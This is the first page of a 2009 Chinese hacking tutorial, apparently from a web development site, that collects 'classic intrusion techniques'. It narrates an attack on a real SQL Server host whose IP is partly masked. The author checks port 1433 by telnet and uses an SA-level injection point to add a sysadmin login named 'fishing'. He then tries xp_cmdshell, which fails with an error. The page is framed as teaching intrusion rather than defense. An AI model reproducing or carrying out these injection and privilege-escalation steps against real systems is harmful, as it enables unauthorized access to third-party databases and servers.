WEB开发网
开发学院网络安全黑客技术 几个用过的经典入侵技巧整理 阅读

几个用过的经典入侵技巧整理

 2009-06-15 16:54:51 来源:WEB开发网   
核心提示:这期这篇文章呢其实是比较杂乱的,所以我也不知道题目要用什么好,几个用过的经典入侵技巧整理,不过相信我,这篇文章看完之后你一定会学到很多新的在渗透过程中思路,使用SQL server的查询分析器连上,然后执行exec master.dbo.xp_cmdshell ’net user’ 发现提示错误

这期这篇文章呢其实是比较杂乱的,所以我也不知道题目要用什么好,不过相信我,这篇文章看完之后你一定会学到很多新的在渗透过程中思路,OK,跟我来吧!

一、SQL server的灵活应用

我们知道在渗透过程中思路是最重要的,有时候往往一个细节就决定成败。呵呵,不过理论终究是理论,看过我以前文章的朋友一定知道,我更喜欢以一个事例来讲解一个东西。因为我只是讲一个思路的问题,所以就不会写很多,只写经典的部分,如果大家需要的话以后我会单独写一篇渗透的文章,来详细介绍每一个方法的使用。OK,我们开始吧!

话说前几天朋友丢给我一个SA的注射点.但是死活就是不能执行命令。说问我能不能帮忙看看。既然朋友说话了并且据说是非常BT的SA,自己也愿意挑战下。拿到地址后首先telnet一下它的1433。呵呵,这个可能很多朋友就不会注意为什么要先telnet呢?因为是SA嘛,只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去,这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:

exec master.dbo.sp_addlogin fishing hook;

exec master.dbo.sp_addsrvrolemember fishing,sysadmin

这个命令就是添加一个用户名为fishing密码为hook的SQL用户,权限为SA。两次执行页面都返回成功,说明用户添加成功了。使用SQL server的查询分析器连上,然后执行exec master.dbo.xp_cmdshell ’net user’ 发现提示错误:

错误消息

50001,级别 1,状态 50001

xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)

1 2 3 4 5 6  下一页

Tags:经典 入侵 技巧

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接